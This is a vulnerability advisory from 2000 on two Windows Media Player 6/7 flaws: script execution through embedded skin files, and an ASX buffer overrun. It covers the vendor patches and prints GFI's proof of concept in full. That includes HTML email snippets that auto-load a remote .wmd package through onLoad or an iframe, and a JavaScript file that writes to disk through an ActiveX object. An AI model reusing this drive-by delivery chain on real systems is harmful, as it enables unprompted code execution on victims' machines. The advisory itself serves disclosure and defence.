Reported November 23, 2000 by @Stake and GFI

VERSIONS AFFECTED
  • Windows Media Player 7
  • Windows Media Player 6

DESCRIPTION

Two vulnerabilities in Microsoft Windows Media Player have been discovered.  The first vulnerability allows the execution of arbitrary code.  By embedding a javascript (.js) file within a Media Player skin file (.wmz) a malicious user can cause media player to automatically run the code.  Media Player does not prompt users before running code that appears to be Media Player files.

The second vulnerability is a buffer overrun.  The problem lies in how Media Player deals with the .ASX file format.  This vulnerability can allow the execution of arbitrary code.

DEMONSTRATION

The following demonstration for the first vulnerability was provided GFI;

----\[Proof of concept Exploit:

<Embedded within an HTML file or e-mail>

E-mail Example 1.

<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) \{ //v2.0
alert('This exploit will now open a new window\n
and automatically download the wmd file\n
and execute it. This will create a file named\n
gfiseclab.txt in your C:\\');
window.open(theURL,winName,features);
\}
//-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd',','width=0,height=0')">
</Embedded within an HTML e-mail>

E-mail Example 2.

<html>
<body>
<script>
alert('This exploit will now open a new window \n and automatically download
the wmd file \n
and execute it. This will create a file named \n gfiseclab.txt in your
C:\\')</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
-------------------------------------

test.wmd is a compressed zip file which contains the following files:

* test.asx: meta file which points to an mpg file and the exploit skin file
* test.mpg: an example mpeg movie.
* test.wmz: the exploit skin file.

test.wmz is also a compressed zip file containing:

* test.js: our javascript which contains the following code

************************************

var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload()\{
playAgain();
\}

************************************

* test.wms: another metafile which calls test.js

----------------------------------------------------

The second vulnerability proof of concept was provided by @Stake

http://www.atstake.com/research/advisories/2000/asx-bufferoverrun.zip

VENDOR RESPONSE

Microsoft has released a security bulletin, MS00-090 and patches to repair the vulnerability.

Windows Media Player 6.4:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069

Windows Media Player 7:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26067

CREDIT
Discovered by
@Stake and GFI